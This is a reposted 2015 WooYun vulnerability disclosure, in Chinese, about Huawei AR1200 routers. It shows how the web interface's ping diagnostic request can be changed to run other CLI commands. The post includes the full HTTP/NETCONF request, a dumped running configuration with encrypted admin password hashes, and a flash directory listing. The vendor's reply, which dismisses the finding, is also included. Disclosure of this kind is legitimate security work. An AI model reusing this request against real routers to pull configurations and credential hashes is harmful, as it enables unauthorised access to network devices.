发新话题
打印

华为AR1200系列路由器后台代码任意执行

华为AR1200系列路由器后台代码任意执行

漏洞概要
缺陷编号:        WooYun-2015-117671
漏洞标题:        华为AR1200系列路由器后台代码任意执行
相关厂商:        华为技术有限公司
漏洞作者:        1c3z
提交时间:        2015-06-02 11:15
公开时间:        2015-06-06 08:14
漏洞类型:        命令执行
危害等级:        中
自评Rank:        8
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:        http://www.wooyun.org
Tags标签:远程命令执行

漏洞详情披露状态:
2015-06-02:        细节已通知厂商并且等待厂商处理中
2015-06-06:        厂商已经主动忽略漏洞,细节向公众公开

简要描述:学校来了一批路由器,不会配,然后测试测试了下
详细说明:有这么个功能

系统管理 > 诊断 > Ping









抓包


code 区域POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no

SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>



把<ping>192.168.1.1</ping>

改为<display>current-configuration</display>

返回内容


code 区域HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
  <ok/>
</rpc-reply>

[V200R005C10SPC500]
#
drop illegal-mac alarm
#
wlan ac-global carrier id other ac id 0
#
pki realm default
enrollment self-signed
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default  
domain default_admin  
local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
local-user admin privilege level 3
local-user admin service-type telnet web http
#
firewall zone Local
priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
snmp-agent local-engineid 800007DB0330D17EED3C03
#
http server enable
http secure-server enable
#
user-interface con 0
authentication-mode password
set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
authentication-mode aaa
#
wlan ac
#
voice
#
diagnose
#
return

漏洞证明:
code 区域<dir></dir>

HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
  <ok/>
</rpc-reply>

Directory of flash:/

  Idx  Attr     Size(Byte)  Date        Time(LMT)  FileName
    0  -rw-        304,700  Mar 27 2015 15:22:32   sacrule.dat
    1  -rw-          3,850  Jun 02 2015 07:30:07   mon_file.txt
    2  -rw-    111,630,208  Jun 11 2014 03:05:56   AR1220F-V200R005C10SPC500.cc
    3  -rw-              0  Mar 27 2015 15:21:58   brdxpon_snmp_cfg.efs
    4  -rw-            694  Mar 30 2015 15:25:26   vrpcfg.zip
    5  -rw-            396  Mar 30 2015 15:25:26   private-data.txt
    6  drw-              -  Jun 11 2014 12:28:36   dhcp
    7  drw-              -  Jun 11 2014 12:28:38   security
    8  -rw-          1,260  Jun 11 2014 12:29:28   rsa_host_key.efs
    9  -rw-            540  Jun 11 2014 12:29:32   rsa_server_key.efs

510,484 KB total (401,132 KB free)

修复方案:你们更专业。。



版权声明:转载请注明来源 1c3z@乌云

漏洞回应
厂商回应:
危害等级:无影响厂商忽略

忽略时间:2015-06-06 08:14
厂商回复:感谢白帽子对华为公司安全的关注。经确认,该权限为登录用户默认权限。并非漏洞。

最新状态:暂无


[ 本帖最后由 linda 于 2015-10-28 17:25 编辑 ]

TOP

发新话题